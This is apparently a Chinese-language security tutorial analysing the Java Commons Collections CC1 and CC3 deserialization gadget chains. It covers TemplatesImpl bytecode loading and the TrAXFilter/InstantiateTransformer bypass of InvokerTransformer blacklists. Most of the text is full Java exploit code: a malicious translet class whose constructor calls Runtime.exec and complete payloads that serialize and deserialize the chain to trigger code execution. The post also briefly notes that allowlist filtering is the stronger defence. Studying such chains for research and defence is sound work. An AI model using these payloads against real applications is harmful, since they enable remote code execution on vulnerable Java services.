一、原理CC1链中我们是通过调用Runtime.getRuntime().exec()来执行系统命令，而另一个方向我们可以通过TemplatesImpl加载字节码的类，通过调用其newTransformer() 方法，即可执行这段字节码的类构造器，我们在类构造器中加入恶意代码即可执行任意命令。二、分析构造1.CC1链在CC1链中我们的payload如下Transformer[] transformers new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc}),
};
ChainedTransformer chainedTransformer new ChainedTransformer(transformers);
Map innerMap new HashMap();
Map outerMap TransformedMap.decorate(innerMap, null, chainedTransformer);
outerMap.put(test, xxxx);2.TemplatesImpl动态加载我们用TemplatesImpl()动态加载字节码如下byte[] code Base64.getDecoder().decode(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);
TemplatesImpl obj new TemplatesImpl();
setFieldValue(obj, _bytecodes, new byte[][] {code});
setFieldValue(obj, _name, test);
setFieldValue(obj, _tfactory, new TransformerFactoryImpl());其中setFieldValue()的代码如下public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);
}其中base64中的内容为如下代码编译后再经base64编码得到的结果（仅供参考）package com.TemplastesImplTest;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;public class codeTest extends AbstractTranslet {Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public codeTest() throws Exception{Runtime.getRuntime().exec(calc);}
}3.transformers设置那么两个合并到一起就可以执行任意字节码，只需要将第一个demo中InvokerTransformer执行的“方法”改成TemplatesImpl::newTransformer()Transformer[] transformers new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer(newTransformer, null, null)
};4.则改造好的payload如下public class CC3 {public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {byte[] code Base64.getDecoder().decode(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);TemplatesImpl obj new TemplatesImpl();setFieldValue(obj, _bytecodes, new byte[][] {code});setFieldValue(obj, _name, test);setFieldValue(obj, _tfactory, new TransformerFactoryImpl());Transformer[] newTransformers new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer(newTransformer, null, null)};ChainedTransformer chainedTransformer new ChainedTransformer(newTransformers);HashMap hashMap new HashMap();Map decorate TransformedMap.decorate(hashMap, null, chainedTransformer);decorate.put(test,test);}
}三、ysoserial的CC3链分析1.背景2015年初frohoff和gebl发布了Talk《Marshalling Pickles: how deserializing objects will ruin your day》以及Java反序列化利用工具ysoserial，随后引爆了安全界。开发者们自然会去找寻一种安全的过滤方法，于是类似SerialKiller这样的工具随之诞生。SerialKiller是一个Java反序列化过滤器，可以通过黑名单与白名单的方式来限制反序列化时允许通过的类。在其发布的第一个版本代码中我们可以看到其给出了最初的黑名单，这个黑名单中InvokerTransformer赫然在列，也就切断了CommonsCollections1的利用链。有攻就有防，ysoserial随后增加了不少新的Gadgets，其中就包括CommonsCollections3。这也说明仅靠类名黑名单来过滤反序列化并不可靠，防御侧更应采用白名单方式只允许预期的类。2.TrAXFilterCommonsCollections3的目的很明显，就是为了绕过一些规则对InvokerTransformer的限制。CommonsCollections3并没有使用到InvokerTransformer来调用任意方法，而是用到了另一个类com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter。这个类的构造方法中调用了(TransformerImpl) templates.newTransformer()，免去了我们使用InvokerTransformer手工调用newTransformer() 方法这一步。3.InstantiateTransformer当然缺少了InvokerTransformer，TrAXFilter的构造方法也是无法调用的。这里会用到一个新的Transformer，就是org.apache.commons.collections.functors.InstantiateTransformer。InstantiateTransformer也是一个实现了Transformer接口的类，它的作用就是调用构造方法。所以我们实现的目标就是利用InstantiateTransformer 来调用到TrAXFilter 的构造方法，再利用其构造方法里的templates.newTransformer() 调用到TemplatesImpl 里的字节码。4.CommonsCollections3所以新构造的Transformer调用链如下Transformer[] newTransformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),new InstantiateTransformer(new Class[]{Templates.class},new Object[]{obj})};则重新改造的payload如下public class CC3 {public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {byte[] code Base64.getDecoder().decode(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);TemplatesImpl obj new TemplatesImpl();setFieldValue(obj, _bytecodes, new byte[][] {code});setFieldValue(obj, _name, test);setFieldValue(obj, _tfactory, new TransformerFactoryImpl());Transformer[] newTransformersnewfail new Transformer[]{new ConstantTransformer(1)};Transformer[] newTransformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),new 
InstantiateTransformer(new Class[]{Templates.class},new Object[]{obj})};ChainedTransformer chainedTransformer new ChainedTransformer(newTransformersnewfail);HashMap hashMap new HashMap();Map decorate LazyMap.decorate(hashMap, chainedTransformer);TiedMapEntry tme new TiedMapEntry(decorate, keykey);Map expMap new HashMap();expMap.put(tme, valuevalue);decorate.remove(keykey);Field f ChainedTransformer.class.getDeclaredField(iTransformers);f.setAccessible(true);f.set(chainedTransformer, newTransformers);ByteArrayOutputStream barr new ByteArrayOutputStream();ObjectOutputStream oos new ObjectOutputStream(barr);oos.writeObject(expMap);oos.close();ObjectInputStream objectInputStream new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));objectInputStream.readObject();}
}